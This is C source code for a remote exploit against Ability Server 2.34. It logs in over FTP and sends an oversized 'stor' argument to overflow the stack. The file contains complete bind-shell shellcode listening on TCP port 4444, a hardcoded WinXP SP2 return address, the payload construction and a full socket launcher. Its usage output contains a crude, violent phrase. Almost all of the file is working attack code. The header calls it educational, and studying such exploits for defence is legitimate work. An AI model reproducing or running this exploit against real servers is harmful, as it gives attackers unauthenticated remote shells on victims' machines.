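/*
 * Ability Server 2.34 Remote Exploit
 * http://users.pandora.be/bratax/
 *
 * Just a basic stack buffer overflow in the argument of the FTP "stor"
 * command.
 *
 * Greetz go out to:
 *   - muts @ http://www.whitehat.co.il/ for the vulnerability + example exploit
 *   - kralor @ http://www.coromputer.net/ for teaching me everything
 *   - Sergio Alvarez for the shellcode :D
 *
 * Notes:
 *   [+] For education purposes only!
 *   [+] You need valid credentials for the FTP server: the vulnerable buffer
 *       is the argument of the "stor" command, which is only reachable after
 *       a successful login, so this is a post-authentication bug.
 *   [+] I know there was already an exploit by muts for this vulnerability.
 *       I didn't just rewrite his Python code; I wrote the whole exploit on my
 *       own. I did use the same shellcode (originally written by Sergio
 *       Alvarez) and I did use the original exploit to learn more about the
 *       vulnerability.
 *   [+] The payload is build-specific: the return address 0x7c941eed was
 *       taken from Windows XP SP2 (Dutch edition) and is unlikely to be valid
 *       on other builds or language editions, so it has to be re-derived per
 *       target. The shellcode binds a command shell on TCP port 4444; as the
 *       nc example below shows, that shell has no authentication of its own,
 *       so anyone who can reach the host can use it.
 *
 * Payload layout (see build_payload):
 *   "stor " | 969 x 'A' | ret addr (4) | 100 x NOP | shellcode (399) | 500 x 'B' | "\r\n"
 *
 * **************************************************
 * Example:
 *
 *   c:\bratax\ability>as.exe 127.0.0.1 hack me
 *   raping target...done
 * **************************************************
 *   c:\bratax\ability>nc.exe 127.0.0.1 4444
 *   Microsoft Windows XP [versie 5.1.2600]
 *   (C) Copyright 1985-2001 Microsoft Corp.
 *
 *   C:\bratax\ability>exit
 * **************************************************
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#if defined(_MSC_VER) && _MSC_VER < 1900
/* Old MSVC has no snprintf; _snprintf returns -1 on overflow, which the
 * callers below treat as an error, so the bounded behaviour is preserved. */
#define snprintf _snprintf
#endif
#else
/* POSIX sockets: map the few Winsock names used below so the launcher also
 * builds on a non-Windows attacking host. */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
typedef int SOCKET;
#define INVALID_SOCKET (-1)
#define closesocket(s) close(s)
#endif

#define PORT 21              /* victim FTP control port */
#define CMD_LINE_SIZE 200    /* longest "user"/"pass" line we will send */
#define REPLY_BUF_SIZE 1000  /* bytes read per FTP reply */

/* Offsets of the overflowing stor argument. */
enum {
    CMD_LEN     = 5,    /* strlen("stor ") */
    PAD_LEN     = 969,  /* 'A' filler from the argument start up to the saved return address */
    NOP_LEN     = 100,  /* NOP sled in front of the shellcode */
    TRAILER_LEN = 500   /* 'B' bytes after the shellcode, see build_payload */
};

/*
 * 0x7c941eed stored little-endian. A fixed address inside WinXP SP2 (Dutch)
 * system code; the author does not say which instruction it points at.
 * Presumably a jump-to-stack gadget, which would explain the NOP sled that
 * directly follows it -- TODO confirm against the target DLL.
 */
static const unsigned char ret_addr[4] = { 0xed, 0x1e, 0x94, 0x7c };

/*
 * Bind shell on TCP port 4444 (Sergio Alvarez), 399 bytes. It is copied by
 * SHELLCODE_LEN below, not strlen(), so an embedded NUL can never truncate
 * the payload.
 */
static const unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

#define SHELLCODE_LEN (sizeof shellcode - 1)   /* drop the string literal's NUL */
#define PAYLOAD_LEN (CMD_LEN + PAD_LEN + sizeof ret_addr + NOP_LEN + SHELLCODE_LEN + TRAILER_LEN + 2)

/* Print why a socket call failed and exit. */
static void die(const char *what)
{
#ifdef _WIN32
    fprintf(stderr, "\n%s failed: Winsock error %d\n", what, WSAGetLastError());
#else
    perror(what);
#endif
    exit(1);
}

/*
 * Read FTP replies into buf (buflen bytes) until one starts with `code`
 * (e.g. "331 "). buf is NUL-terminated on return. Exits on a closed
 * connection, a socket error, or a negative reply (4xx/5xx, e.g. a failed
 * login) -- the original ignored recv()'s result and spun forever in all of
 * those cases. Matching is on the leading bytes of each chunk only, as in
 * the original, so it is best-effort for multi-line replies.
 */
static void expect_reply(SOCKET s, const char *code, char *buf, size_t buflen)
{
    size_t codelen = strlen(code);

    for (;;) {
        int n = (int)recv(s, buf, (int)(buflen - 1), 0);

        if (n == 0) {
            fprintf(stderr, "\nconnection closed while waiting for \"%s\"\n", code);
            exit(1);
        }
        if (n < 0)
            die("recv");
        buf[n] = '\0';

        if (strncmp(buf, code, codelen) == 0)
            return;
        if (buf[0] == '4' || buf[0] == '5') {
            fprintf(stderr, "\nserver refused (expected %s): %s", code, buf);
            exit(1);
        }
    }
}

/* Send exactly len bytes, looping on short writes. Exits on error. */
static void send_all(SOCKET s, const char *buf, size_t len)
{
    while (len > 0) {
        int n = (int)send(s, buf, (int)len, 0);

        if (n < 0)
            die("send");
        buf += n;
        len -= (size_t)n;
    }
}

/*
 * Send "<verb> <arg>\r\n". The line is bounded by CMD_LINE_SIZE and the
 * command is refused rather than truncated when arg does not fit. (The
 * original strcpy()'d argv into 50-byte locals first, so a long username or
 * password overflowed the exploit's own stack.)
 */
static void send_cmd(SOCKET s, const char *verb, const char *arg)
{
    char line[CMD_LINE_SIZE];
    int n = snprintf(line, sizeof line, "%s %s\r\n", verb, arg);

    if (n < 0 || (size_t)n >= sizeof line) {
        fprintf(stderr, "\n%s argument too long (max %u bytes)\n",
                verb, (unsigned)(sizeof line - strlen(verb) - 4));
        exit(1);
    }
    send_all(s, line, (size_t)n);
}

/*
 * Fill buf with the overflowing stor command and return the number of bytes
 * written (always PAYLOAD_LEN):
 *   "stor " | PAD_LEN x 'A' | ret_addr | NOP_LEN x 0x90 | shellcode | TRAILER_LEN x 'B' | "\r\n"
 * The 'A's run up to offset CMD_LEN + PAD_LEN (974), where the saved return
 * address is overwritten with ret_addr. The author found that the exploit
 * did not fire without the 'B' trailer but did not establish why; presumably
 * the server only mishandles arguments beyond some minimum length -- TODO
 * confirm. Every length is explicit, so no strlen() is involved anywhere.
 */
static size_t build_payload(unsigned char *buf)
{
    size_t off = 0;

    memcpy(buf + off, "stor ", CMD_LEN);
    off += CMD_LEN;
    memset(buf + off, 'A', PAD_LEN);
    off += PAD_LEN;
    memcpy(buf + off, ret_addr, sizeof ret_addr);
    off += sizeof ret_addr;
    memset(buf + off, 0x90, NOP_LEN);
    off += NOP_LEN;
    memcpy(buf + off, shellcode, SHELLCODE_LEN);
    off += SHELLCODE_LEN;
    memset(buf + off, 'B', TRAILER_LEN);
    off += TRAILER_LEN;
    memcpy(buf + off, "\r\n", 2);
    off += 2;
    return off;
}

/*
 * usage: as.exe <ip> <username> <password>
 * Logs in to the target's FTP server with the given credentials (sent in
 * clear text, as FTP does), then sends the overflowing stor command. On
 * success the shellcode listens on TCP port 4444 on the target.
 */
int main(int argc, char *argv[])
{
    unsigned char evilrequest[PAYLOAD_LEN];
    char reply[REPLY_BUF_SIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;
    SOCKET sockfd;
#ifdef _WIN32
    WSADATA wsaData;
#endif

    if (argc != 4) {
        printf("\nAbility Server 2.34 Exploit by bratax\n\n");
        printf("[+] tested on WinXP SP2 Dutch Edtion - using return addy 0x7c941eed\n");
        printf("[+] spawns a shell on p4444\n");
        printf("[+] usage: %s <ip> <username> <password>\n\n", argv[0]);
        exit(1);
    }

#ifdef _WIN32
    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
        fprintf(stderr, "WSAStartup failed.\n");
        exit(1);
    }
#endif

    /* argv[1] is resolved, so a hostname works as well as a dotted quad. */
    he = gethostbyname(argv[1]);
    if (he == NULL)
        die("gethostbyname");
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof their_addr.sin_addr) {
        fprintf(stderr, "%s did not resolve to an IPv4 address\n", argv[1]);
        exit(1);
    }

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET)
        die("socket");

    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    memcpy(&their_addr.sin_addr, he->h_addr_list[0], sizeof their_addr.sin_addr);

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) != 0)
        die("connect");

    /* Plain FTP login; the vulnerable command is only accepted once logged in. */
    expect_reply(sockfd, "220 ", reply, sizeof reply);
    send_cmd(sockfd, "user", argv[2]);
    expect_reply(sockfd, "331 ", reply, sizeof reply);
    send_cmd(sockfd, "pass", argv[3]);
    expect_reply(sockfd, "230", reply, sizeof reply);

    if (build_payload(evilrequest) != sizeof evilrequest) {
        fprintf(stderr, "payload size mismatch\n");
        exit(1);
    }

    printf("raping target...");
    fflush(stdout);
    send_all(sockfd, (const char *)evilrequest, sizeof evilrequest);
    printf("done");

    closesocket(sockfd);
#ifdef _WIN32
    WSACleanup();
#endif
    return 0;
}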